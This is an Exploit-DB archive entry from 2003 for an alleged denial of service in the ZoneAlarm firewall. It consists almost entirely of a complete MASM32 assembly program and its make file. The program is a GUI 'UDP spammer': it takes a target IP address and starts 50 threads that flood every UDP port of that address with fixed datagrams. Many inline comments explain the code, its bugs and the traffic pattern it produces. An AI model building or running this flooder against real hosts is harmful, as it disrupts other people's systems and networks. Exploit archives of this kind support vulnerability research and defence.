- EDB-ID
- 23090
- Проверка EDB
-
- Пройдено
- Автор
- IGOR FRANCHUK
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- null
- Дата публикации
- 2003-09-02
Код:
source: https://www.securityfocus.com/bid/8525/info
A denial of service vulnerability has been alleged in ZoneAlarm. It is reportedly possible to reproduce this condition by sending a flood of UDP packets of random sizes to random ports on a system hosting the vulnerable software.
;// This is a multithreaded UDP spammer
;/
;//
;// [email protected] Igor Franchuk
;//
;//---------------------------------------------------------------------------
; #########################################################################
; Assembler/ABI: MASM (Intel syntax), 32-bit flat model, stdcall; Win32 GUI plus Winsock 2.
; Build with the make file at the end of the listing (ml /c /coff, Link /SUBSYSTEM:WINDOWS).
.386
.model flat, stdcall
option casemap :none
; MASM32 SDK headers and import libraries, referenced by fixed paths under \masm32.
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
include \masm32\include\advapi32.inc
includelib \masm32\lib\advapi32.lib
include \masm32\include\comctl32.inc
includelib \masm32\lib\comctl32.lib
include \masm32\include\ws2_32.inc
includelib \masm32\lib\ws2_32.lib
; #########################################################################
; Forward declarations (stdcall).
WinMain proto :DWORD,:DWORD,:DWORD,:DWORD
SetTransparency proto :DWORD,:BYTE
GetRegString proto :DWORD,:DWORD,:DWORD,:DWORD ; declared only: no GetRegString is defined or called in this listing
Spam proto :DWORD ; thread entry point, started 50 times from WndProc
; #########################################################################
.DATA
; Static strings. ClassName and Caption are fixed identifiers of the built binary
; (window class "ZADOSWndClassObject", window title "ZoneAlarm DOS test").
ClassName db "ZADOSWndClassObject",0
Caption db "ZoneAlarm DOS test",0
User32lib db "user32",0 ; module name resolved at run time in SetTransparency
SetLayeredWindowAttributesName db "SetLayeredWindowAttributes",0 ; looked up with GetProcAddress
SBuf db 255,255,255,255,255,255,255,255,255,255,255,255 ; 12 x 0FFh; not referenced anywhere in this listing
IPEditBox db "SysIPAddress32",0 ; common-controls IP address edit class
BtnName db "button",0
OKBtnCaption db "Spam",0
msgEmptyAdr db "Invalid IP",0
msgWinSockErrorAdr db "WinSocket 2.0 is required. WSAStartup failed",0 ; also the datagram payload: Spam sends its first 40 bytes
msgWinSockErrorSock db "Invalid socket",0
CancelBtnCaption db "Cancel",0
ProtoName db "udp",0 ; getprotobyname argument
CThread DWORD 0 ; never written anywhere in this listing; Spam compares its ThreadID against it
GThreadExit DWORD 0 ; 1 = all Spam threads must stop; cleared before the threads are created, set by Cancel
.DATA?
hInstance HANDLE ?
hIPEditWnd HANDLE ? ; IP address control
hwndOKBtn HANDLE ?
hwndCancelBtn HANDLE ?
icex INITCOMMONCONTROLSEX <> ; declared but never referenced; InitCommonControls is called without it
tIPAdr DWORD ? ; target IPv4: host order from IPM_GETADDRESS, then byte-swapped (REVERSE) to network order
Socket DWORD ? ; the one UDP socket shared by every Spam thread
tIPAdrSN HANDLE ? ; dotted-string pointer returned by inet_ntoa
WSAData WSADATA <>
SIN sockaddr_in <> ; shared destination; each Spam thread overwrites sin_port before connect
TID HANDLE ? ; CreateThread lpThreadId out-param, overwritten by every thread created
; Minimal protoent layout; only p_proto (offset 8) is read, and the caller masks it to 16 bits.
PROTOENTSTRUCT STRUCT
p_name DWORD ?
p_aliases DWORD ?
p_proto DWORD ?
PROTOENTSTRUCT ENDS
.CONST
WS_EX_LAYERED equ 80000h ; extended style required by SetLayeredWindowAttributes
LWA_ALPHA equ 2h ; use the bAlpha argument
IPEditID equ 100h ; child-control ids checked in WM_COMMAND
OKBtnID equ 200h
CancelBtnID equ 201h
IPM_ISBLANK equ (WM_USER+105) ; IP address control: non-zero when all fields are empty
IPM_GETADDRESS equ (WM_USER+102) ; IP address control: stores the address in the DWORD at lParam
; #########################################################################
; REVERSE ip -- eax = ip with its four bytes reversed (IPv4 host order <-> network order).
; In:   ip   dword memory operand (tIPAdr in the only use)
; Out:  eax  reversed dword
; Clobbers: eax, flags. ebx is saved and restored. Only .386 instructions are used (no bswap),
; presumably to match the .386 directive, so the swap goes word by word through bx.
REVERSE MACRO ip
push ebx
mov ebx, ip
xchg bh, bl ; low word: swap bytes 0 and 1
mov ax, bx
shr ebx, 16
xchg bh, bl ; high word: swap bytes 2 and 3
shl eax, 16 ; swapped low word becomes the new high word (old high half of eax is shifted out)
mov ax, bx
pop ebx
ENDM
; MAKEWORD bLow, bHigh -- eax = bLow or (bHigh shl 8); used once as MAKEWORD 2, 0 for WSAStartup (2.0 -> eax = 2).
; Clobbers: eax, ebx (ebx is NOT restored, unlike REVERSE), flags.
; xor stands in for or: equivalent only while bLow fits in 8 bits, so the two operands never overlap.
MAKEWORD MACRO bLow, bHigh
mov eax, bLow
mov ebx, bHigh
shl ebx, 8
xor eax, ebx
ENDM
; #########################################################################
.CODE
start:
; #Init
; Process entry (named by 'end start' at the bottom): fetch hInstance and the command line,
; run WinMain, then exit with code 0 (WinMain's return value is discarded).
invoke GetModuleHandle, NULL; get the instance handle of our program.
mov hInstance,eax
invoke GetCommandLine; command-line pointer in eax, passed straight through as lpCmdLine.
invoke WinMain, hInstance,NULL,eax, SW_SHOWDEFAULT ; call the main function
invoke ExitProcess,0
; #########################################################################
WinMain proc hInst:HINSTANCE, hPrevInst:HINSTANCE, lpCmdLine:HANDLE, mCmdShow:DWORD
; int WinMain(hInst, hPrevInst, lpCmdLine, mCmdShow)
; Registers the window class, creates the main (tool) window, makes it translucent,
; then runs the message loop. Returns msg.wParam (the PostQuitMessage code) in eax.
; hPrevInst and lpCmdLine are not read.
LOCAL wc:WNDCLASSEX
LOCAL msg:MSG
LOCAL hWnd:HWND
mov wc.cbSize,SIZEOF WNDCLASSEX
mov wc.style,CS_DBLCLKS + CS_HREDRAW + CS_VREDRAW
mov wc.lpfnWndProc, OFFSET WndProc
mov wc.cbClsExtra,NULL
mov wc.cbWndExtra,NULL
push hInst
pop wc.hInstance ; memory-to-memory copy through the stack
mov wc.hbrBackground,COLOR_WINDOW+1
mov wc.lpszMenuName,NULL
mov wc.lpszClassName,OFFSET ClassName
invoke LoadIcon,NULL,IDI_APPLICATION
mov wc.hIcon,eax
mov wc.hIconSm,eax
invoke LoadCursor,NULL,IDC_ARROW
mov wc.hCursor,eax
invoke RegisterClassEx, addr wc ; return value not checked
;# WS_EX_LEFT+ WS_EX_LTRREADING + WS_EX_TOOLWINDOW,\
; dwStyle 16CC0000h is a hard-coded combination: WS_VISIBLE or WS_CLIPSIBLINGS or
; WS_CLIPCHILDREN or WS_CAPTION or WS_SYSMENU or WS_THICKFRAME adds up to this value
; (confirm against windows.inc). A 256x118 tool window at the default position.
invoke CreateWindowEx,\
WS_EX_LEFT+ WS_EX_LTRREADING + WS_EX_TOOLWINDOW + WS_EX_WINDOWEDGE,\
ADDR ClassName,\
ADDR Caption,\
16CC0000h,\
CW_USEDEFAULT,\
CW_USEDEFAULT,\
256,\
118,\
NULL,\
NULL,\
hInst,\
NULL
mov hWnd,eax ; not checked for NULL
invoke SetTransparency,hWnd,200 ; alpha 200/255
invoke ShowWindow, hWnd, mCmdShow
invoke UpdateWindow, hWnd
.WHILE TRUE ; Enter message loop
invoke GetMessage, ADDR msg,NULL,0,0
.BREAK .IF (!eax) ; WM_QUIT (GetMessage returned 0); a -1 error return is not distinguished and keeps looping
invoke TranslateMessage, ADDR msg
invoke DispatchMessage, ADDR msg
.ENDW
mov eax,msg.wParam ; return exit code in eax
ret
WinMain endp
; #########################################################################
SetTransparency proc hWnd:HANDLE, bAlpha:BYTE
; void SetTransparency(hWnd, bAlpha)
; Turns on WS_EX_LAYERED for hWnd and sets a constant alpha through SetLayeredWindowAttributes,
; which is resolved at run time -- presumably so the program still loads where user32 lacks
; that export; the call is then simply skipped. Best effort: no error is ever reported.
; Only the low byte of the pushed argument is read (mov al,bAlpha): WndProc passes 500,
; which arrives here as 244 (0F4h) -- presumably unintended.
LOCAL hLib:HANDLE
LOCAL SetLayeredWindowAttr:HANDLE
LOCAL WInfo:DWORD ; unused
invoke LoadLibrary,addr User32lib ; user32 is already linked in (includelib); this only obtains a handle by unqualified module name
mov hLib,eax
.IF eax
invoke GetProcAddress, hLib, addr SetLayeredWindowAttributesName
mov SetLayeredWindowAttr, eax
.IF eax
invoke GetWindowLong,hWnd,GWL_EXSTYLE
or eax, WS_EX_LAYERED
invoke SetWindowLong, hWnd, GWL_EXSTYLE, eax
; SetLayeredWindowAttributes(hWnd, 0 /*crKey*/, bAlpha, LWA_ALPHA): arguments pushed right to left, stdcall (callee cleans).
push LWA_ALPHA
xor eax,eax
mov al,bAlpha ; zero-extend the BYTE parameter
push eax
push NULL
push hWnd
call [SetLayeredWindowAttr]
.ENDIF
invoke FreeLibrary,hLib
.ENDIF
ret
SetTransparency endp
; #########################################################################
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
; LRESULT WndProc(hWnd, uMsg, wParam, lParam) -- main window procedure.
; WM_CREATE:        builds the IP edit control and the Spam/Cancel buttons.
; WM_SIZE:          re-centres the controls horizontally.
; WM_COMMAND/Spam:  reads the address, initialises Winsock 2.0, opens one UDP socket
;                   and starts 50 Spam threads on it.
; WM_COMMAND/Cancel: sets GThreadExit and closes the socket.
; Returns 0 for handled messages, DefWindowProc's result otherwise.
; NOTE: the WM_SIZE and WM_COMMAND paths overwrite ebx and edi without saving them,
; although a Win32 callback is expected to preserve ebx/esi/edi; left as in the original.
LOCAL protoent:DWORD
mov eax, uMsg
.IF eax==WM_DESTROY ; if the user closes our window
invoke PostQuitMessage,NULL ; quit our application
.ELSEIF eax==WM_CREATE
invoke InitCommonControls
; IP address control (SysIPAddress32), child id IPEditID
invoke CreateWindowEx,NULL,ADDR IPEditBox,NULL,\
WS_VISIBLE or WS_BORDER or WS_CHILD,11,\
90,180,25,hWnd,IPEditID,\
hInstance,NULL
mov hIPEditWnd,eax
invoke CreateWindowEx,NULL, ADDR BtnName,ADDR OKBtnCaption,\
WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON or BS_FLAT,\
35,50,80,25,hWnd,OKBtnID,hInstance,NULL
mov hwndOKBtn,eax
invoke CreateWindowEx,NULL, ADDR BtnName,ADDR CancelBtnCaption,\
WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON or BS_FLAT,\
134,50,80,25,hWnd,CancelBtnID,hInstance,NULL
mov hwndCancelBtn,eax
INVOKE EnableWindow,hwndCancelBtn,FALSE ; Cancel is enabled only while threads are running
invoke SetTransparency, hwndOKBtn, 500 ; bAlpha is a BYTE: only the low byte (244) is used
invoke SetFocus,hIPEditWnd
.ELSEIF eax==WM_SIZE
mov eax,lParam
mov edx,eax
shr edx,16 ; edx = new client height (unused)
and eax,0ffffh ; eax = new client width
mov ebx, eax
shr ebx,1
sub ebx,90 ; ebx = x of the IP control and the Spam button (centre - 90)
mov ecx,ebx
add ecx,99 ; ecx = x of the Cancel button
push ecx ; ecx is caller-saved: keep it across the two invokes
invoke MoveWindow,hIPEditWnd,ebx,10,180,25,TRUE
invoke MoveWindow,hwndOKBtn,ebx,50,80,25,TRUE
pop ecx
invoke MoveWindow,hwndCancelBtn,ecx,50,80,25,TRUE
; invoke MoveWindow,hwndStatus,0,0,0,0,TRUE
.ELSEIF eax==WM_COMMAND
mov eax,wParam
.IF lParam == 0;from what window hWnd = 0 - main, !=0 - from a child control
; menu/accelerator commands: nothing to do
.ELSE
.IF ax==OKBtnID;what control
shr eax,16
.IF ax==BN_CLICKED;what message
invoke SendMessage, hIPEditWnd, IPM_ISBLANK, 0, 0
.IF !EAX
invoke SendMessage, hIPEditWnd, IPM_GETADDRESS, 0, ADDR tIPAdr
REVERSE tIPAdr ; eax = address in network byte order
mov tIPAdr, eax
invoke inet_ntoa, tIPAdr
mov tIPAdrSN, eax
invoke MessageBox,NULL, tIPAdrSN,tIPAdrSN,MB_OK + MB_SYSTEMMODAL ; echoes the parsed address back (debug-style confirmation)
MAKEWORD 2, 0 ; eax = 0002h = Winsock version 2.0 (clobbers ebx)
invoke WSAStartup,eax,ADDR WSAData
;invoke WSAStartup,101h,addr WSAData ;initialise le socket
.IF !eax
invoke getprotobyname, ADDR ProtoName ; result is dereferenced below without a NULL check
mov protoent, eax
mov edi, eax
assume edi:PTR PROTOENTSTRUCT
xor ebx,ebx
mov ebx, [edi].p_proto
assume edi:nothing
and ebx,00FFFFh ; p_proto is read as a DWORD but only its low 16 bits are kept
invoke socket,AF_INET,SOCK_DGRAM,ebx
.IF eax!=INVALID_SOCKET
mov Socket, eax
invoke EnableWindow,hwndOKBtn,FALSE
invoke EnableWindow,hwndCancelBtn,TRUE
mov SIN.sin_family,AF_INET
push tIPAdr
pop SIN.sin_addr
mov GThreadExit, 0
xor ebx, ebx
; Start 50 Spam threads, each given its index (0..49) as ThreadID.
; NORMAL_PRIORITY_CLASS is a process-priority constant, not a CreateThread flag -- presumably ignored; verify.
; Thread handles are never closed; TID is overwritten by each call.
.WHILE ebx < 50
mov eax,OFFSET Spam
push ebx
invoke CreateThread,NULL,NULL,eax,ebx,NORMAL_PRIORITY_CLASS, ADDR TID
pop ebx
inc ebx
.ENDW
; mov eax,1
; invoke Spam, eax
.ELSE
invoke WSAGetLastError ; result discarded; a fixed message is shown instead
invoke MessageBox,hWnd,ADDR msgWinSockErrorSock,ADDR Caption,MB_OK + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
.ENDIF
.ELSE
invoke MessageBox,hWnd,ADDR msgWinSockErrorAdr,ADDR Caption,MB_OK + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
.ENDIF
.ELSE
invoke MessageBox,hWnd,ADDR msgEmptyAdr,ADDR Caption,MB_OK + MB_ICONERROR + MB_SYSTEMMODAL + MB_SETFOREGROUND
invoke SetFocus,hIPEditWnd
.ENDIF
.ENDIF
.ELSEIF ax==CancelBtnID;what control
shr eax,16
.IF ax==BN_CLICKED;what message
invoke EnableWindow,hwndOKBtn,TRUE
invoke EnableWindow,hwndCancelBtn,FALSE
mov GThreadExit, 1 ; Spam threads poll this flag and stop
invoke closesocket, Socket ; WSACleanup is never called in this listing
.ENDIF
.ENDIF
.ENDIF
.ELSE
invoke DefWindowProc,hWnd,uMsg,wParam,lParam ; Default message processing
ret
.ENDIF
xor eax,eax
ret
WndProc endp
; #########################################################################
Spam proc ThreadID:DWORD
; DWORD WINAPI Spam(DWORD ThreadID) -- thread body; 50 instances share Socket and SIN.
; Each turn sets SIN.sin_port to the next port (edx = 1..65535, then 0, then 1.. again),
; connect()s the shared UDP socket to it and send()s the first 40 bytes of
; msgWinSockErrorAdr. Return values of htons/connect/send are ignored.
; Exit conditions: GThreadExit == 1 (set by Cancel), or ThreadID == CThread; CThread is
; never written and stays 0, so the thread with ThreadID 0 sends one datagram and exits.
; Observable pattern for detection: one source host emitting UDP datagrams with a fixed
; 40-byte payload that walk every destination port in sequence.
; SIN is shared without any lock, so concurrent threads race on sin_port and the port
; actually connected may differ from this thread's edx.
; Registers: ebx = run flag, edx = port counter; both are kept across the calls by push/pop
; (edx is caller-saved under stdcall; the ebx push is redundant but harmless).
xor edx, edx
mov ebx,1
.WHILE ebx
mov eax, ThreadID
.IF CThread == eax
mov ebx,0
.ENDIF
.IF GThreadExit == 1
mov ebx,0
.ENDIF
.IF edx < 65535
inc edx
.ELSE
xor edx,edx ; wraps to port 0 once, then counts up again
.ENDIF
push edx
push ebx
invoke htons, edx
mov SIN.sin_port,ax
invoke connect, Socket, addr SIN ,sizeof SIN ; on a UDP socket this only sets the default destination
invoke send, Socket, ADDR msgWinSockErrorAdr, 40, 0
pop ebx
pop edx
.ENDW
ret
Spam endp
end start
--------------------------------------make file-------------------------------------------
# nmake rules for the listing above; assumes the MASM32 SDK at c:\masm32 (ml, Link, \masm32\lib).
NAME=zados
$(NAME).exe: $(NAME).obj
Link /SUBSYSTEM:WINDOWS /LIBPATH:c:\masm32\lib $(NAME).obj
$(NAME).obj: $(NAME).asm
ml /c /coff /Cp $(NAME).asm
- Источник
- www.exploit-db.com